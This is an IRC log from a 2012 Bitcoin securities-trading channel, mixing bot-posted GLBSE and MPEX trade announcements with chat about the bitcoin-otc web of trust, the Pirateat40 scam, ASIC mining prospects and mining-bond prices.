17 05:29:06 [GLBSE] [TYGRR.BOND-D] 20 @ 1.01 = 20.2 BTC [+] Sep 17 05:36:25 ;;calc 28000.0 / [bc,24hprc] Sep 17 05:36:26 2360.87689713 Sep 17 05:38:15 Bugpowder yeah Sep 17 05:38:17 [GLBSE] [GIGAMINING] 1 @ 0.619899 BTC [+] Sep 17 05:38:19 [GLBSE] [GIGAMINING] 9 @ 0.62 = 5.58 BTC [+] Sep 17 05:38:34 Bugpowder well, you get your account history with stats. have you been throwing them out ? Sep 17 05:38:55 heheh Sep 17 05:39:01 a stat will report all movements from 1 hour before the prev stat Sep 17 05:39:10 it's not "short term", it's just "what happened since last time" Sep 17 05:39:35 I ah Sep 17 05:39:40 beyond 1hr? Sep 17 05:39:56 suppose you stat on june 5th, at 9pm Sep 17 05:40:03 [MPEX] [O.BTCUSD.P140N] 1 @ 0.41584229 BTC [+] Sep 17 05:40:04 then you stat again on june 9th, at 8pm Sep 17 05:40:16 this later stat has all data from june 5th, 8pm till june 9th, 8pm Sep 17 05:40:32 OK Sep 17 05:40:38 so you know, keep em! Sep 17 05:40:42 Now I know, and knowing is half the battle Sep 17 05:41:07 and as to the "infestation" : it is very speciffic to the global scam exchange Sep 17 05:41:07 Bugpowder: what you are looking for is a feature of a broker, not an exchange Sep 17 05:41:20 it has nothing to do with the community, it's that group with bitcoinica, intersango et all Sep 17 05:43:23 do you think the wot actually facilitates scams? Sep 17 05:43:35 maybe prevents small stuff Sep 17 05:43:43 but facilitates big stuff Sep 17 05:43:51 nah. the wot correctly used prevents all scams. Sep 17 05:44:04 the problem is that it requires competence in using. Sep 17 05:44:16 people just go at the summed up ratings and act as if that means anything. it does not. Sep 17 05:44:30 the wot is a WEB of trust not a sum of trust. it's not the sot. it's the wot. Sep 17 05:44:35 yeah, don't used the ;;getrating as judge Sep 17 05:44:36 yes, people gave pirate millions off of ratings he got for $50 ppusd trades and free food/namecoins Sep 17 05:44:41 use ;;get trust Sep 17 05:44:49 like a pgp web of trust Sep 17 05:44:49 ;;gettrust mircea_popescu Sep 17 05:44:50 Trust relationship from user smickles to user mircea_popescu: Level 1: 3, Level 2: 19 via 15 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=smickles&dest=mircea_popescu Sep 17 05:44:56 yeah, that. Sep 17 05:45:06 [GLBSE] [FPGAMINING] 6 @ 0.688 = 4.128 BTC [-] Sep 17 05:45:08 then you look there and see WHO rated X guy, and what they said. it's a process. Sep 17 05:45:12 fuck Sep 17 05:45:40 then examine the details of the connections that make the l2 trust score Sep 17 05:45:44 <[\\\]> yes, people gave pirate millions off of ratings he got for $50 ppusd trades and free food/namecoins << he had 4 digit trades too Sep 17 05:45:55 <[\\\]> once again, you've got incomplete information Sep 17 05:46:02 he's had 5 digit trades. Sep 17 05:46:07 <[\\\]> yep Sep 17 05:46:08 he worked his way up Sep 17 05:46:24 <[\\\]> everyone does Sep 17 05:46:25 but the level of trust required did not scale Sep 17 05:46:39 dust-otc this is empirically true, but it's not a flaw of the wot system Sep 17 05:46:45 it's a flaw of the judgements people made about it. Sep 17 05:46:55 I only trust people here who have a net positive financial incentive not to steal all your money Sep 17 05:46:59 they;'ve all learned a smarting lesson in log vs exp curves now. Sep 17 05:47:17 <[\\\]> mircea_popescu: I'll see your 4 and raise you a 2 Sep 17 05:47:31 Bugpowder this is a good point. for instance in my position : my holdings of s.mpoe are worth at current market rates ~4mn usd. Sep 17 05:47:36 like they run some actual legitimate business with solid cash flow Sep 17 05:47:47 that sort of thing acts as a decent anchor. Sep 17 05:48:02 and stealing all the money will kill their future earning potential with it Sep 17 05:48:09 eeexactly. Sep 17 05:48:42 people that have some demonstration of competence Sep 17 05:48:47 and their work Sep 17 05:49:01 I know basically nobody here Sep 17 05:49:11 well one important point is to not rush. Sep 17 05:49:11 been on forums for a few weeks Sep 17 05:49:33 I like this gigavps guy, looks competent Sep 17 05:49:43 nice rig pics Sep 17 05:49:43 <[\\\]> shutup sock Sep 17 05:49:46 lol Sep 17 05:49:50 heh heh heh Sep 17 05:49:52 just an example Sep 17 05:50:03 lolwut ? Sep 17 05:50:18 what securities to buy Sep 17 05:50:18 <[\\\]> just pulling on powder's wick Sep 17 05:50:26 go for the market leader Sep 17 05:50:45 best chance of getting the rigs up and running the fastest. Sep 17 05:51:13 with the specs for the asics (provided they actually show up) it doesn't seem much work to get them fired and running Sep 17 05:51:23 Need an early order Sep 17 05:51:33 need to get on the first shipment Sep 17 05:53:16 anyway, gotta go home. 8:30am to 10:50pm work day... 8 mice now injected with channelrhodopsin virus though. Big success. Peace out. Sep 17 05:55:26 ;;google channelrhodopsin Sep 17 05:55:27 Channelrhodopsin - Wikipedia, the free encyclopedia: ; Channelrhodopsins - OpenOptogenetics.org: ; Channelrhodopsin-2, a directly light-gated cation-selective membrane: Sep 17 05:56:27 [GLBSE] [RSM] 10 @ 0.3 = 3 BTC [+] Sep 17 05:56:42 [GLBSE] [FPGAMINING] 7 @ 0.697 = 4.879 BTC [+] Sep 17 05:58:09 [GLBSE] [GIGAMINING] 1 @ 0.62 BTC [+] Sep 17 05:58:45 [GLBSE] [FPGAMINING] 6 @ 0.698 = 4.188 BTC [+] Sep 17 06:03:29 [GLBSE] [BLUECHIP] 61 @ 0.1 = 6.1 BTC [+] Sep 17 06:03:43 https://glbse.com/ipo/189 Sep 17 06:04:27 [GLBSE] [GREEN] 1 @ 0.20500001 BTC [+] Sep 17 06:04:28 [GLBSE] [GREEN] 10 @ 0.205 = 2.05 BTC [-] Sep 17 06:04:49 [GLBSE] [GREEN] 9 @ 0.13 = 1.17 BTC [-] Sep 17 06:04:50 [GLBSE] [GREEN] 10 @ 0.1 = 1 BTC [-] Sep 17 06:05:20 [GLBSE] [GREEN] 1 @ 0.01 BTC [-] Sep 17 06:05:21 [GLBSE] [GREEN] 23 @ 0.01 = 0.23 BTC [-] Sep 17 06:05:51 [MPEX] [S.MPOE] 23967 @ 0.000407 = 9.7546 BTC [+] Sep 17 06:05:53 [MPEX] [S.MPOE] 12077 @ 0.000407 = 4.9153 BTC [+] Sep 17 06:05:54 [MPEX] [O.BTCUSD.C120T] 700 @ 0.107283 = 75.0981 BTC [-] Sep 17 06:06:14 ;;pl FPGAMINING Sep 17 06:06:15 Error: "pl" is not a valid command. Sep 17 06:06:28 !pl Sep 17 06:06:29 !pl [@] [] Sep 17 06:06:53 <[\\\]> Diablo-D3: like that do ya? Sep 17 06:06:57 !pl FPGAMINING Sep 17 06:06:57 !pl [@] [] Sep 17 06:07:00 whos is that? Sep 17 06:07:06 !pl DMC 2500 Sep 17 06:07:06 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 06:07:07 DMC [1@2BTC] paid: 0.02635814 BTC. Last price: 0.095 BTC. Capital gain: -1.905 BTC. Total: -1.87864186 BTC. (-93.9%) Sep 17 06:07:20 !pl FPGAMINING 1 Sep 17 06:07:21 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 06:07:23 FPGAMINING [1@1BTC] paid: 0.3240279 BTC. Last price: 0.698 BTC. Capital gain: -0.302 BTC. Total: 0.0220279 BTC. (2.2%) Sep 17 06:07:24 hrm thats not what I expected Sep 17 06:07:55 <[\\\]> Diablo-D3: I believe that is buzzdave Sep 17 06:08:46 [GLBSE] [SS] 9 @ 0.026 = 0.234 BTC [+] Sep 17 06:10:18 <[\\\]> up up and away! Sep 17 06:13:37 [GLBSE] [BMMO] 3 @ 0.075849 = 0.2275 BTC [-] Sep 17 06:14:11 [GLBSE] [BMMO] 1 @ 0.07585 BTC [+] Sep 17 06:14:13 [GLBSE] [BMMO] 1 @ 0.07685 BTC [+] Sep 17 06:14:52 [GLBSE] [BMMO] 25 @ 0.076888 = 1.9222 BTC [+] Sep 17 06:25:45 [GLBSE] [OBSI.HRPT] 7 @ 0.10010001 = 0.7007 BTC [-] Sep 17 06:27:50 [GLBSE] [SS] 150 @ 0.026 = 3.9 BTC [+] Sep 17 06:32:01 [MPEX] [F.GIGA.ETF] 193 @ 0.0004 = 0.0772 BTC [+] Sep 17 06:47:28 [GLBSE] [IBB] 1 @ 0.5897 BTC [-] Sep 17 06:47:30 [GLBSE] [IBB] 1 @ 0.5898 BTC [+] Sep 17 06:49:13 [GLBSE] [JLP-BMD] 10 @ 0.0849 = 0.849 BTC [-] Sep 17 06:52:34 !ticker s.mpoe Sep 17 06:52:35 [MPEX:S.MPOE] 1day: 0.00039781 / 0.00040983 / 0.00042 (1383988 shares, 567.21 BTC), 30day: 0.000035 / 0.00038555 / 0.00042 (74085443 shares, 28,563.82 BTC) Sep 17 06:56:24 [GLBSE] [NYAN.A] 1 @ 0.999999 BTC [+] Sep 17 07:00:41 [GLBSE] [IBB] 1 @ 0.5898 BTC [+] Sep 17 07:02:01 [MPEX] [S.MPOE] 7600 @ 0.00040705 = 3.0936 BTC [+] Sep 17 07:02:31 [GLBSE] [JAH] 1 @ 0.125 BTC [-] Sep 17 07:02:32 [GLBSE] [JAH] 50 @ 0.12 = 6 BTC [-] Sep 17 07:06:26 weird, I has litecoins and I dont know wai Sep 17 07:12:08 theymos>> I'll probably disable images in posts eventually, too. Sep 17 07:12:11 zomg. Sep 17 07:14:22 Dub lol Sep 17 07:14:29 nothing wrong with ltc Sep 17 07:15:09 why would theymos get rid of images? Sep 17 07:15:12 odd Sep 17 07:16:22 I installed the daemon at some stage, don't remember ever mining or antyhing but I have a few tx with 20-30ltc each inbound Sep 17 07:18:24 !pl DMC 2500 Sep 17 07:18:24 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 07:18:27 DMC [1@2500BTC] paid: 0.02635814 BTC. Last price: 0.095 BTC. Capital gain: -2499.905 BTC. Total: -2499.87864186 BTC. (-100%) Sep 17 07:18:31 if you bought shares for 2500btc each Sep 17 07:28:03 going to bed Sep 17 07:28:04 night all Sep 17 07:31:01 [MPEX] [S.MPOE] 33500 @ 0.00040705 = 13.6362 BTC [+] Sep 17 07:31:02 [MPEX] [S.MPOE] 17100 @ 0.00040705 = 6.9606 BTC [+] Sep 17 07:44:20 !pl MOORE 0.5 Sep 17 07:44:21 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 07:44:26 MOORE [1@0.5BTC] paid: 0.0707159 BTC. Last price: 0.495 BTC. Capital gain: -0.005 BTC. Total: 0.0657159 BTC. (13.1%) Sep 17 07:45:04 !pl MOORE 0.5 2012-08-10 Sep 17 07:45:04 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 07:45:09 MOORE [1@0.5BTC] (since: 2012-08-10) paid: 0.0196402 BTC. Last price: 0.495 BTC. Capital gain: -0.005 BTC. Total: 0.0146402 BTC. (2.9%) Sep 17 07:45:15 !pl COGNITIVE 0.5 Sep 17 07:45:15 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 07:45:26 COGNITIVE [1@0.5BTC] paid: 0.09217435 BTC. Last price: 0.44 BTC. Capital gain: -0.06 BTC. Total: 0.03217435 BTC. (6.4%) Sep 17 07:45:41 !pl COGNITIVE 0.5 2012-08-10 Sep 17 07:45:42 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 07:45:46 COGNITIVE [1@0.5BTC] (since: 2012-08-10) paid: 0.01848832 BTC. Last price: 0.44 BTC. Capital gain: -0.06 BTC. Total: -0.04151168 BTC. (-8.3%) Sep 17 07:45:49 :O cognitive traded below IPO Sep 17 07:46:00 I'm gonna buy some shares Sep 17 07:47:41 I don't know whether people are skeptical of the integrity of GLBSE or what... Sep 17 07:47:51 Garr255: Look at the spread Sep 17 07:47:56 if you want to buy say 10 Sep 17 07:47:58 insane, I know Sep 17 07:48:05 you'll pay 0.625 Sep 17 07:48:15 and you can sell if for 0.25 Sep 17 07:48:25 doesn't look very safe to me Sep 17 07:49:27 once we get the asics cognitive will soar :) Sep 17 07:49:36 I'm gonna spend all my glbse money :P Sep 17 07:49:41 [GLBSE] [COGNITIVE] 1 @ 0.62479997 BTC [+] Sep 17 07:49:42 [GLBSE] [COGNITIVE] 13 @ 0.62479998 = 8.1224 BTC [+] Sep 17 07:49:47 boom. Sep 17 07:50:14 you mean difficulty will soar Sep 17 07:50:46 asics or no, there's only 50 bitcoins pr block for the taking Sep 17 07:51:43 yup. Cog is going to be doing the same (if not better) as always, while non-upgrading assets will be worth satoshis Sep 17 07:52:32 or they'll switch to mining altchains Sep 17 07:52:51 [00:47] I don't know whether people are skeptical of the integrity of GLBSE or what... Sep 17 07:53:13 litecoin difficulty is going to soar, surely Sep 17 07:53:23 Why would they? Sep 17 07:54:52 One person has actually had me move his shares off of GLBSE, and I pay him dividends individually. I believe he thinks nefario isn't keeping up with maintenece. Sep 17 07:55:36 =/ Sep 17 07:55:50 =/ indeed Sep 17 07:56:17 He has been working on the platform. I don't see why it wouldn't be maintained properly... Sep 17 07:56:38 Although I can understand if he fears something happening to Nefario instead. Sep 17 07:56:43 or the platform Sep 17 07:57:01 We wouldn't like all data being lost. Sep 17 07:58:01 [MPEX] [S.MPOE] 5000 @ 0.00040704 = 2.0352 BTC [-] Sep 17 07:58:02 [MPEX] [S.MPOE] 52437 @ 0.00040704 = 21.344 BTC [-] Sep 17 08:01:20 One person has actually had me move his shares off of GLBSE, and I pay him dividends individually. I believe he thinks nefario isn't keeping up with maintenece. Sep 17 08:01:27 wow, that's awesome Sep 17 08:01:57 BTC-Mining: what's your ticker and/or bitcointalk page or blog or whatever? Sep 17 08:02:10 'cause like. awesome Sep 17 08:02:15 just awesome Sep 17 08:03:22 It's Garr255 who had someone move something out of his ticker. Sep 17 08:03:59 [GLBSE] [THUNDERCM.MIF.SHARES] 2 @ 0.3859 = 0.7718 BTC [-] Sep 17 08:04:03 He wasn't quoting me, he was just referring to me. Guess he shouldn't have included the brackets. Sep 17 08:04:37 BTC-Mining, yeah sorry :P Sep 17 08:04:45 kuzetsa, the ticker is COGNITIVE Sep 17 08:04:54 it's my favorite asset :) Sep 17 08:05:08 eek Sep 17 08:05:19 you used the brackets in a VERY confusing way Sep 17 08:05:22 it looked like a quote Sep 17 08:05:45 I have 3 tickers by the way =/ Sep 17 08:05:53 [GLBSE] [THUNDERCM.MIF.SHARES] 3 @ 0.3859 = 1.1577 BTC [-] Sep 17 08:09:48 [GLBSE] [OBSI.HRPT] 1 @ 0.10239999 BTC [+] Sep 17 08:10:09 [GLBSE] [DI.BFLSC.FAIL] 65 @ 0.001 = 0.065 BTC [+] Sep 17 08:22:28 [MPEX] [O.BTCUSD.C110T] 400 @ 0.15855955 = 63.4238 BTC [+] Sep 17 08:23:38 [MPEX] [F.GIGA.ETF] 1534 @ 0.00038595 = 0.592 BTC [-] Sep 17 08:33:49 !pl TYGRR-BOND.P 1.02 Sep 17 08:33:50 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 08:33:51 GLBSE 404 Sep 17 08:34:01 !pl TYGRR.BOND-P 1.02 Sep 17 08:34:02 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 08:34:05 TYGRR.BOND-P [1@1.02BTC] paid: 0.816 BTC. Last price: 0.07760309 BTC. Capital gain: -0.94239691 BTC. Total: -0.12639691 BTC. (-12.4%) Sep 17 08:45:12 [GLBSE] [OBSI.HRPT] 6 @ 0.10239999 = 0.6144 BTC [+] Sep 17 08:45:14 [GLBSE] [OBSI.HRPT] 54 @ 0.1024 = 5.5296 BTC [+] Sep 17 08:45:38 [GLBSE] [JAH] 1 @ 0.12 BTC [-] Sep 17 08:45:43 [GLBSE] [OBSI.HRPT] 2 @ 0.1024 = 0.2048 BTC [+] Sep 17 08:45:45 [GLBSE] [OBSI.HRPT] 48 @ 0.1025 = 4.92 BTC [+] Sep 17 08:46:34 [GLBSE] [CPA] 300 @ 0.03299999 = 9.9 BTC [+] Sep 17 08:47:56 !pl TYGRR.BOND-P 0.0001 Sep 17 08:47:56 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 17 08:47:59 TYGRR.BOND-P [1@0.0001BTC] paid: 0.816 BTC. Last price: 0.07760309 BTC. Capital gain: 0.07750309 BTC. Total: 0.89350309 BTC. (893503.1%) Sep 17 08:48:11 I'll take 1000! Sep 17 08:54:59 [MPEX] [F.GIGA.ETF] 3500 @ 0.000395 = 1.3825 BTC [+] Sep 17 08:55:01 [MPEX] [S.MPOE] 30600 @ 0.00040705 = 12.4557 BTC [+] Sep 17 08:55:02 [MPEX] [S.MPOE] 17116 @ 0.00040705 = 6.9671 BTC [+] Sep 17 09:08:44 usagi im not sure buying that bond is a good idea Sep 17 09:09:09 asics will kill the price very soon Sep 17 09:09:18 but if you want more i have some to sell... Sep 17 09:11:40 Chaang-Noi: your prediction is that bitcoin will hit an inflation cycle because of ASIC? Sep 17 09:11:46 How much are they? Sep 17 09:11:47 devauing? Sep 17 09:11:52 *devalue Sep 17 09:13:42 i think asics will make the difficulty rise significantly Sep 17 09:13:48 thus the payout on the bonds go way down Sep 17 09:13:55 i think buying my mining bonds right now is a bad idea Sep 17 09:21:39 seems they sold at .12 Sep 17 09:22:00 [MPEX] [F.GIGA.ETF] 8100 @ 0.000395 = 3.1995 BTC [+] Sep 17 09:22:10 i think once asics hit and the black reward goes down to 25 the price will go to maybe 10% of what it is now Sep 17 09:27:40 [GLBSE] [OBSI.HRPT] 2 @ 0.1025 = 0.205 BTC [+] Sep 17 09:29:31 ch Sep 17 09:29:36 Chaang-Noi: I disagree Sep 17 09:29:58 june / july 2013, bitcoin will be worth USD 8 or more Sep 17 09:30:38 by then, things should've stablized from the reward halving and the ASIC launch(es) Sep 17 09:45:24 [GLBSE] [FUTUREFUND] 6 @ 0.00012936 = 0.0008 BTC [+] Sep 17 09:45:50 [GLBSE] [FUTUREFUND] 3 @ 0.00012936 = 0.0004 BTC [+] Sep 17 09:46:12 [GLBSE] [FUTUREFUND] 1 @ 0.00012936 BTC [+] Sep 17 09:50:01 [MPEX] [S.MPOE] 6989 @ 0.00040706 = 2.8449 BTC [+] Sep 17 09:50:02 [MPEX] [S.MPOE] 43000 @ 0.00040706 = 17.5036 BTC [+] Sep 17 09:50:04 [MPEX] [S.MPOE] 9467 @ 0.00040706 = 3.8536 BTC [+] Sep 17 09:59:37 kuzetsa> june / july 2013, bitcoin will be worth USD 8 or more i also think they will be worth more than 8 USD Sep 17 09:59:47 if you mean 8 pounds of gold i dont agree Sep 17 10:00:01 do you know btc is now worth near 12$? Sep 17 10:00:09 why do you think it would not only go up in the next year? Sep 17 10:00:16 or did you mean $80 ? Sep 17 10:00:21 [02:22:13] i think once asics hit and the black reward goes down to 25 the price will go to maybe 10% of what it is now Sep 17 10:00:34 i was talking about my bonds Sep 17 10:00:38 oh Sep 17 10:00:40 your what? Sep 17 10:00:41 my bonds will lose 90% of the value Sep 17 10:00:56 buying my mining bonds like usagi just did, i think its a bad idea Sep 17 10:01:06 oh yeah? Sep 17 10:01:13 what are the terms of your mining bond? Sep 17 10:01:38 1 mhs Sep 17 10:01:50 1 mhs a sec is not goin to be worth much this Jan IMO\ Sep 17 10:02:02 uhm Sep 17 10:02:12 [03:00:24] [02:22:13] i think once asics hit and the black reward goes down to 25 the price will go to maybe 10% of what it is now Sep 17 10:02:14 what's the reasoning there? Sep 17 10:02:20 so is this 1 MH/s bond currently costing more than 10 bitcents per? Sep 17 10:02:28 we are talking aobut differnt things Sep 17 10:02:39 oh Sep 17 10:02:50 i was talking about my 1 mhs mining bond he was talking bout btc Sep 17 10:02:55 aha, of course Sep 17 10:02:55 ws a mistake Sep 17 10:03:02 :) Sep 17 10:03:08 speaking of mistakes. kuzesa != he Sep 17 10:03:19 wow typo'd my own handle I should go to bed Sep 17 10:03:27 'nite copumpkin Sep 17 10:03:31 I promise I'm not going to sleep with kuzetsa Sep 17 10:03:37 night kuzetsa! Sep 17 10:03:38 sounds nice Sep 17 10:03:40 I like bodyheat Sep 17 10:03:43 lol Sep 17 10:03:45 lol Sep 17 10:03:46 night Sep 17 10:03:47 my gf would not approve Sep 17 10:03:53 my BF would think it's cute Sep 17 10:03:54 :P Sep 17 10:04:33 ⨀_⨀ Sep 17 10:15:31 [GLBSE] [NYAN.C] 3 @ 0.3 = 0.9 BTC [-] Sep 17 10:16:00 [MPEX] [S.MPOE] 12462 @ 0.00040705 = 5.0727 BTC [-] Sep 17 10:41:14 [GLBSE] [BTCMC] 16 @ 0.5897 = 9.4352 BTC [+] Sep 17 10:41:14 [GLBSE] [BTCMC] 14 @ 0.5898 = 8.2572 BTC [+] Sep 17 10:41:46 [MPEX] [S.MPOE] 50717 @ 0.00040704 = 20.6438 BTC [-] Sep 17 10:41:47 [MPEX] [S.MPOE] 883 @ 0.00040704 = 0.3594 BTC [-] Sep 17 10:42:35 [GLBSE] [ASICMINER] 22 @ 0.10750101 = 2.365 BTC [-] Sep 17 10:42:36 [GLBSE] [ASICMINER] 16 @ 0.10750001 = 1.72 BTC [-] Sep 17 10:44:11 [GLBSE] [OBSI.HRPT] 8 @ 0.1026 = 0.8208 BTC [+] Sep 17 11:04:00 [MPEX] [O.BTCUSD.P020T] 7 @ 0.02536061 = 0.1775 BTC [+] Sep 17 11:10:07 [GLBSE] [FUTUREFUND] 1 @ 0.00012936 BTC [+] Sep 17 11:11:58 https://bitcointalk.org/index.php?topic=109660.msg1192188#msg1192188 Sep 17 11:12:17 theymos is a glbse 'shareholder' Sep 17 11:13:51 last bit of credibility, gone Sep 17 11:32:00 [MPEX] [F.GIGA.ETF] 2266 @ 0.000395 = 0.8951 BTC [+] Sep 17 11:32:01 [MPEX] [F.GIGA.ETF] 500 @ 0.00038609 = 0.193 BTC [-] Sep 17 11:38:18 [GLBSE] [MU] 2 @ 0.2 = 0.4 BTC [-] Sep 17 11:39:15 [GLBSE] [OBSI.HRPT] 5 @ 0.1026 = 0.513 BTC [+] Sep 17 11:42:26 [GLBSE] [PPT.E] 77 @ 0.32 = 24.64 BTC [-] Sep 17 11:46:09 [GLBSE] [OBSI.HRPT] 1 @ 0.1025 BTC [-] Sep 17 11:48:08 [GLBSE] [RSM] 10 @ 0.3 = 3 BTC [+] Sep 17 11:48:23 [GLBSE] [BFLS.RIG] 2 @ 0.9 = 1.8 BTC [-] Sep 17 11:57:59 [MPEX] [F.GIGA.ETF] 900 @ 0.00038305 = 0.3447 BTC [-] Sep 17 12:05:30 [GLBSE] [BIB.PIRATE] 8 @ 0.05 = 0.4 BTC [+] Sep 17 12:05:54 [GLBSE] [007] 10 @ 0.12 = 1.2 BTC [+] Sep 17 12:16:36 [GLBSE] [BIB.PIRATE] 109 @ 0.03 = 3.27 BTC [-] Sep 17 12:17:08 [GLBSE] [FOO.PPPPT] 100 @ 0.04 = 4 BTC [-] Sep 17 12:17:10 [GLBSE] [FOO.PPPPT] 50 @ 0.031 = 1.55 BTC [-] Sep 17 12:17:11 [GLBSE] [FOO.PPPPT] 30 @ 0.0301 = 0.903 BTC [-] Sep 17 12:17:12 [GLBSE] [FOO.PPPPT] 108 @ 0.03 = 3.24 BTC [-] Sep 17 12:19:41 [GLBSE] [OBSI.HRPT] 49 @ 0.1025 = 5.0225 BTC [-] Sep 17 12:19:42 [GLBSE] [OBSI.HRPT] 87 @ 0.1026 = 8.9262 BTC [+] Sep 17 12:19:44 [GLBSE] [OBSI.HRPT] 100 @ 0.1027 = 10.27 BTC [+] Sep 17 12:19:45 [GLBSE] [OBSI.HRPT] 100 @ 0.1028 = 10.28 BTC [+] Sep 17 12:19:46 [GLBSE] [OBSI.HRPT] 99 @ 0.1028 = 10.1772 BTC [+] Sep 17 12:19:47 [GLBSE] [OBSI.HRPT] 400 @ 0.1029 = 41.16 BTC [+] Sep 17 12:19:49 [GLBSE] [OBSI.HRPT] 165 @ 0.103 = 16.995 BTC [+] Sep 17 12:20:51 [GLBSE] [OBSI.HRPT] 5 @ 0.103 = 0.515 BTC [+] Sep 17 12:24:00 [MPEX] [F.GIGA.ETF] 6200 @ 0.00038305 = 2.3749 BTC [-] Sep 17 12:24:01 [MPEX] [S.BVPS] 400 @ 0.00320948 = 1.2838 BTC [+] Sep 17 12:39:26 [GLBSE] [MOORE] 38 @ 0.495 = 18.81 BTC [+] Sep 17 12:39:28 [GLBSE] [MOORE] 2 @ 0.5 = 1 BTC [+] Sep 17 12:44:57 [GLBSE] [FPGA-EU] 3 @ 0.24 = 0.72 BTC [+] Sep 17 12:46:43 [GLBSE] [OBSI.HRPT] 3 @ 0.102 = 0.306 BTC [-] Sep 17 12:49:02 [GLBSE] [OBSI.HRPT] 6 @ 0.1025 = 0.615 BTC [+] Sep 17 12:49:32 [GLBSE] [FPGA.CONTRACT] 5 @ 0.074989 = 0.3749 BTC [+] Sep 17 12:50:14 [MPEX] [S.MPOE] 26938 @ 0.00040705 = 10.9651 BTC [+] **** BEGIN LOGGING AT Mon Sep 17 20:49:02 2012 Sep 17 20:51:40 So much nonsense in #BTCST Sep 17 20:51:54 lol Sep 17 20:54:11 How many times can people lose their money in the same scam? Sep 17 20:54:19 let me buy my bonds back Sep 17 20:54:23 When there has been some sense on that channel? Sep 17 20:55:52 Well the occasional nay-sayers that quickly get permabanned for being the cause of all the problems BS&T has. Everyone knows the power "Nay" has on everything. Sep 17 20:56:05 Bugpowder: well, people is still loosing their money on all the forms of fiat... Sep 17 20:56:15 I'm starting a sect worshipping the power of the "Nay" to ruin businesses. Anyone in? Sep 17 20:56:43 BTC-Mining how you mean ? Sep 17 20:57:06 lol Sep 17 20:57:07 o o, i see. Sep 17 20:57:37 :mircea_popescu S.MPOE dividends are divided over the entire 1BB shares right? Or just over some subset of them? Sep 17 20:57:37 Devotes of nay? Sep 17 20:57:46 You go around saying "Nay, an't gunna whork, ye know?" Sep 17 20:57:55 Bugpowder yes, the entire 1 bn. Sep 17 20:58:14 and then watch as the business collapse and everyone shouts at you for cursing the business. Sep 17 20:58:16 tx Sep 17 20:58:36 rdponticelli BTC-Mining the naychurch has been going around not building a great ntemple for ages now. Sep 17 20:59:06 Atheists? Sep 17 20:59:10 xD Sep 17 20:59:15 nay. Sep 17 20:59:32 Seems quite similar. Sep 17 20:59:34 I should really get some of my wife's laid off lawyer friends to go after the pirate case. Sep 17 20:59:35 Nihilists? Sep 17 20:59:45 nope Sep 17 20:59:54 Bugpowder, please do. Sep 17 20:59:57 Bugpowder laid off lawyer women ?! Sep 17 21:00:04 there should be a thematic strip club. Sep 17 21:00:17 usagi: what's the story behind that earlier zeek pastebin? Sep 17 21:00:27 tear off business suits Sep 17 21:00:54 Not sure if any of them really have the financial transactional expertise to do it. Sep 17 21:01:21 if the 100s of defrauded "investors"/idiots had any sense Sep 17 21:01:29 they'd be flooding their local das with complaints Sep 17 21:01:44 sooner or later someone'd prosecute / pretty much everyone'd forward them to federal authorities. Sep 17 21:02:08 Do they have ANY quality legal representation Sep 17 21:02:16 No... Sep 17 21:02:20 you need a skilled contingincy lawyer to go after it Sep 17 21:02:21 Not that I know Sep 17 21:02:55 interesting to see "the zeek rewards crowd" also using pastebin Sep 17 21:03:13 Problem is 5MM is still kinda small potatoes to get the really good lawyers on it Sep 17 21:03:20 [GLBSE] [TYGRR.BOND-P] 49 @ 0.0899 = 4.4051 BTC [+] Sep 17 21:03:21 [GLBSE] [TYGRR.BOND-P] 50 @ 0.0899 = 4.495 BTC [+] Sep 17 21:03:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.24 BTC [+] Sep 17 21:03:25 plus the whole, it was bitcoins not dollars issue Sep 17 21:04:41 You'll have to be satisfied with getting anything back Sep 17 21:04:44 ............................................................................................................ Sep 17 21:04:59 Who would be the point person to connect potential lawyers to? Sep 17 21:07:18 http://i0.kym-cdn.com/entries/icons/original/000/000/554/facepalm.jpg at the 0.24 purchase of TYGRR-P Sep 17 21:08:03 [MPEX] [F.GIGA.ETF] 9290 @ 0.00037689 = 3.5013 BTC [+] Sep 17 21:11:22 BTC-Mining: we're running out of facepalms on this community xD Sep 17 21:11:43 Clusterfuck of people mass still buzzing around Pirateat40 instead of filing complaints. Sep 17 21:11:47 mistake? or someone got excited about the update and doesn't realise who runs that asset lol Sep 17 21:12:06 Lucidize lol Sep 17 21:13:14 Anyone has non-worthless assets to sell? Still got some BTC burining my pockets. Sep 17 21:13:25 FDBF Sep 17 21:13:28 ;) Sep 17 21:13:54 bitfoo bonks brbot BTC-Mining BTCHero Bugpowder Sep 17 21:14:00 BTC-Mining s.dice awaits. Sep 17 21:14:28 Already got some of those Sep 17 21:14:30 [GLBSE] [FPGAMINING] 1 @ 0.6011 BTC [-] Sep 17 21:14:33 Well from the passthrough Sep 17 21:14:49 not that many non-worthless assets around. Sep 17 21:15:14 Seeing what people are buying everyday, you can have some ARS Sep 17 21:15:47 At least, they must be less worthless than most of the other things... Sep 17 21:15:59 But that's sad xD Sep 17 21:19:52 [GLBSE] [PPT.E] 1 @ 0.32 BTC [-] Sep 17 21:20:34 Well at least Patrick Harnett pays the guarantee. Sep 17 21:21:25 [GLBSE] [GSDPT] 50 @ 0.0034 = 0.17 BTC [+] Sep 17 21:23:23 [GLBSE] [GOLD] 1 @ 0.00989 BTC [+] Sep 17 21:27:42 [GLBSE] [PUREMINING] 5 @ 0.0953 = 0.4765 BTC [+] Sep 17 21:28:43 !ticker ss Sep 17 21:28:53 [GLBSE:SS] [Bid: 0.0211] [Ask: 0.0265] [Spread: 0.0054] [Last: 0.0265] [24hVol: 8.0209997] [7dAvg: 0.02252471] Sep 17 21:29:16 And we thought Azelphur was silly to buy all of them and reilst at 2.8! Sep 17 21:29:40 re-list too Sep 17 21:30:03 Making us money even in Bitcoin hard times, good job SS team. Sep 17 21:30:32 didn't they post a 